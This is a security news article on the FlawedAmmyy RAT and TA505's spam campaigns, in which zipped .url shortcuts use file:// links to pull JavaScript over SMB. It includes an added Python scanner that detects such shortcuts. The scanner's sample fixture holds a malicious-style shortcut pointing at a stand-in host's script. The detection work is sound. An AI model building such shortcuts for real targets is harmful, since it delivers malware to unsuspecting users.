FlawedAmmyy RAT Targets Users via Massive Email Campaigns


Security researchers have discovered the usage of a previously undocumented remote access Trojan (RAT) named FlawedAmmyy as the payload in recent massive email campaigns.

The trojan is based on leaked source code for Version 3 of the Ammyy Admin remote desktop software and includes features such as remote desktop control, a file system manager, proxy support and audio chat.

The full remote-control capability gives attackers complete access to infected systems: the ability to use a variety of services, steal files and credentials, and much more.

Researchers from Proofpoint discovered it and said that “FlawedAmmyy has been used since the beginning of 2016 in both highly targeted email attacks as well as massive, multi-million message campaigns. Narrow attacks targeted the Automotive industry among others, while the large malicious spam campaigns appear to be associated with threat actor TA505, an actor responsible for many large-scale attacks since at least 2014.”

The FlawedAmmyy trojan was seen as the payload in two recent massive email campaigns on March 5 and 6, 2018.

The messages were sent from addresses spoofing the recipient’s own domain, with subject lines referring to receipts, bills or invoices, and carried a .zip file as the attachment.

The .zip file contains .url files, which are normally used as shortcuts to websites and automatically launch the default web browser when opened.

In this case, however, the attacker’s URL used the “file://” scheme instead of an http:// link, so when the user opens the attachment Windows downloads and executes a JavaScript file over the SMB protocol instead of launching the web browser.

The JavaScript, in turn, downloads Quant Loader and then the FlawedAmmyy RAT as the final payload.
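The attachment pattern described above can be checked at the mail gateway before a user ever opens it. The following is an added defender-side example, not code from the article or from Proofpoint: it unpacks a zipped attachment, reads the URL= target of every .url member, and flags any target that uses the file:// scheme and names a host other than the local machine, which is exactly the shape that causes an SMB fetch rather than a browser launch. The sample archive, file names and the 203.0.113.5 address are constructed for the demonstration.

```python
import io
import zipfile

LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}  # any other host in file:// means an SMB fetch


def shortcut_target(text):
    """Return the URL= value of an Internet Shortcut (.url) file, or None if absent."""
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key.strip().lower() == "url":
            return value.strip()
    return None


def classify_url(url):
    """'web' for http(s); 'remote_file' for file:// naming another host; 'local_file'; 'other'."""
    scheme, sep, rest = url.partition(":")
    if not sep or scheme.lower() not in ("http", "https", "file"):
        return "other"
    if scheme.lower() != "file":
        return "web"
    rest = rest.replace("\\", "/")           # normalise file://\\host\share\x.js forms
    stripped = rest.lstrip("/")
    slashes = len(rest) - len(stripped)      # 2 or 4 -> a host follows; 3 -> local drive path
    host = stripped.split("/", 1)[0] if slashes in (2, 4) else ""
    return "local_file" if host.lower() in LOCAL_HOSTS else "remote_file"


def scan_attachment(zip_bytes):
    """Inspect every .url member of a zipped attachment; flag remote file:// targets."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith(".url"):
                continue
            url = shortcut_target(archive.read(name).decode("utf-8", "replace"))
            if url is not None:
                kind = classify_url(url)
                findings.append({"member": name, "url": url, "kind": kind,
                                 "suspicious": kind == "remote_file"})
    return findings


def build_sample_zip():
    """Constructed sample (not a real campaign artefact): one SMB shortcut, one web shortcut."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("invoice_4471.url",
                         "[InternetShortcut]\r\nURL=file://\\\\203.0.113.5\\share\\invoice.js\r\n")
        archive.writestr("receipt.url", "[InternetShortcut]\r\nURL=https://example.com/receipt\r\n")
    return buf.getvalue()
```

Running `scan_attachment(build_sample_zip())` reports the first shortcut as a suspicious remote file:// target and the second as an ordinary web link.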


According to the researchers, the group behind the attack is TA505, a threat actor previously responsible for targeting users with the Dridex banking Trojan, Locky ransomware, Jaff ransomware, The Trick banking Trojan and many other large-scale attacks since 2014.

“For infected individuals, this means that attackers potentially have complete access to their PCs, giving threat actors the ability to access a variety of services, steal files and credentials, and much more. We have seen FlawedAmmyy in both massive campaigns, potentially creating a large base of compromised computers, as well as targeted campaigns that create opportunities for actors to steal customer data, proprietary information, and more,” Proofpoint said in its blog post.
